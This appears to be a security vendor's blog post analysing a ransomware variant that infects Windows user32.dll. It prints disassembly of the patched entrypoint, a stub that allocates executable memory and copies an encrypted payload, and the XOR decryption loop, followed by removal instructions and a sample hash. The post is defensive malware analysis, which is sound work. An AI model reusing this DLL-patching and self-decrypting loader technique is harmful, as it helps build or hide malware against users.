Ransomware infecting user32.dll, continued

This post is a follow up on our previous post regarding ransomware infecting user32.dll.

A new variant of the Department of Justice (DOJ) ransomware that embeds itself inside user32.dll is spreading.

Department Of Justice Ransomware

This new variant has updated its tactics to avoid detection by antivirus programs. The following section shows an analysis of this new version and indicate the changes have been made.

Virustotal detection

Patched entrypoint
Just as the previous version, the ransomware patches the code in the entrypoint of user32.dll. But this time the malware authors tried to keep the entrypoint as original as possible. Most noticeably they replace the original CALL with a CALL to AlignRect. See the disassembled code below:

Original:

UserClientDllInitialize:
7e41b217  mov   edi, edi 
7e41b219  push  ebp 
7e41b21a  mov   ebp, esp 
7e41b21c  cmp   [ebp+0xC], 1 
7e41b220  jnz   0x7e41b227
7e41b222  call  0x7e41b984
7e41b227  pop   ebp 
7e41b228  nop 
7e41b229  nop 
7e41b22a  nop 
7e41b22b  nop 
7e41b22c  nop 
7e41b22d  mov   edi, edi 
7e41b22f  push  ebp

Patched:

UserClientDllInitialize:
7e41b217  push  ebp 
7e41b218  mov   ebp, esp 
7e41b21a  cmp   [ebp+0xC], 1 
7e41b21e  jne   0x7e41b225
7e41b220  call  USER32!AlignRects (7e46d4e0)
7e41b225  add   [eax], al 
7e41b227  pop   ebp
7e41b228  pop
7e41b229  nop 
7e41b22a  nop 
7e41b22b  nop 
7e41b22c  nop 
7e41b22d  mov   edi, edi 
7e41b22f  push  ebp

Furthermore, the code at AlignRects is modified so that it allocates a new block of executable memory after which it copies the encrypted payload from the resource section to this newly allocated memory. It uses the same technique as the previous version to obtain the address of NtAllocateVirtualMemory() to allocate a writeable/executable region of memory. This memory is used to copy the encrypted payload to, which also contains a small piece of code to decrypt the encrypted payload.

AlignRects:
7e46d4e0  pushad
7e46d4e1  mov   eax,dword ptr [ebp+8]   ; EAX becomes base-address
                                        ; of user32.dll (7E410000)
7e46d4e4  mov   ecx,eax
7e46d4e6  add   eax,13BCh
7e46d4eb  mov   eax,dword ptr [eax]     ; EAX becomes address of
                                        ; NtQueryVirtualMemory
7e46d4ed  add   eax,0FFFFF5F0h          ; EAX becomes address of
                                        ; NtAllocateVirtualMemory
7e46d4f2  sub   esp,8
7e46d4f5  push  40h                     ; PAGE_EXECUTE_READWRITE
7e46d4f7  push  3000h
7e46d4fc  lea   ecx,[ebp-4]
7e46d4ff  mov   [ecx],0E800h
7e46d505  push  ecx
7e46d506  push  0
7e46d508  lea   ecx,[ebp-8]
7e46d50b  mov   [ecx],0
7e46d511  push  ecx
7e46d512  push  0FFFFFFFFh
7e46d514  call  eax                     ; call NtAllocateVirtualMemory
7e46d516  mov   edi,[ebp-8]             ; EDI = allocated address 
                                        ; (00290000)
7e46d519  mov   eax,edi
7e46d51b  mov   esi,[ebp+8]             ; ESI = base-address of user32.dll
                                        ; (7E410000)
7e46d51e  add   esi,8D200h              ; ESI = address of encrypted
                                        ; payload in resource section
7e46d524  mov	ecx,98AEh               ; Number of bytes to copy
7e46d529  rep movs es:[edi],ds:[esi]    ; Copy to allocated (executable)
                                        ; memory range
7e46d52b  add	esp,8
7e46d52e  add	eax,981Eh               ; EAX = address of decryption code
                                        ; (0029981E)
7e46d533  jmp	eax                     ; Start decryption !!

The decryption loop is comparable to the previous version, only some constant values are modified, like for instance the decryption key.

Decryption loop:
0029981e  call  00299823
00299823  pop   edx			; EDX = current location
00299824  sub   edx,7FFA2F3Dh
0029982a  push  esi
0029982b  lea   esi,[edx+7FFA2F38h]	; ESI = 0029981E – start of
                                        ; decryption code
00299831  mov   ecx,981Eh		; Encrypted payload length
00299836  sub   esi,ecx			; ESI = allocated mem-base (290000)
00299838  push  esi
00299839  mov   ebx,1218F90h		; The XOR key (BL only, so 90h)
0029983e  xor   byte ptr [esi],bl	; Decrypt a byte of the encrypted
                                        ; payload
00299840  inc   esi
00299841  inc   ebx			; Modify XOR key for each byte (+1)
00299842  loop  0029983e
00299844  pop   eax
00299845  pop   ecx
00299846  mov   [eax+12h],ecx
00299849  jmp   eax			; Jump to allocated mem-base, which
                                        ; is now decrypted.

Removing the ransomware from your system
Victims can use HitmanPro.Kickstart to get rid of the police themed ransomware infection (including this new variant). If HitmanPro detects the ransomware it will query our cloud service to obtain a clean system file, which will be used to replace the infected one on your system.

If for some reason the specific version of your infected user32.dll cannot be obtained from the cloud service, you can manually copy a clean version of user32.dll onto the HitmanPro.Kickstart flash drive. If the version of the infected file on your disk matches that of the clean version on the flash drive, HitmanPro will use that version to replace the infected one on your Windows installation.

You can download HitmanPro with Kickstart from here:

Auto: http://get.hitmanpro.com
32-bit: http://dl.surfright.nl/HitmanPro.exe
64-bit: http://dl.surfright.nl/HitmanPro_x64.exe

 

Manual replacement of user32.dll
In the occasion that you are not able to obtain a clean version of user32.dll for your system, you can try the following manual procedure.

The ransomware makes an encrypted copy of the original user32.dll file and stores it in:

C:\Windows\System32\user32.ini
or
C:\Windows\SysWOW64\user32.ini.

You can decrypt this file using our User32DLL decryptor tool, which can be downloaded from: http://dl.surfright.nl/User32Decryptor.exe

See the following screenshot for an example:

User32Decryptor

You need to retrieve the encrypted user32.ini by e.g. using a Hiren’s boot-cd or some other bootable medium that is able to access your Windows system disk. Once you have decrypted the file, you can simply copy it to the HitmanPro.Kickstart flash drive. Note that the file must be named user32.dll. Once the decrypted file has been placed on the flash drive, you can boot your system with the HitmanPro.Kickstart flashdrive and HitmanPro will use the manually decrypted user32.dll to replace the infected one on your system.

Note: When performing this action, make a copy of the infected user32.dll. In case something goes wrong with the procedure, you can always restore the infected file so your system will at least be able to boot correctly.

 

Samples:

13E418BF18B03AC80580DB69ADA305A2B7093DFED00692DCF91A99D2526D3A73

Comments are closed.

%d bloggers like this: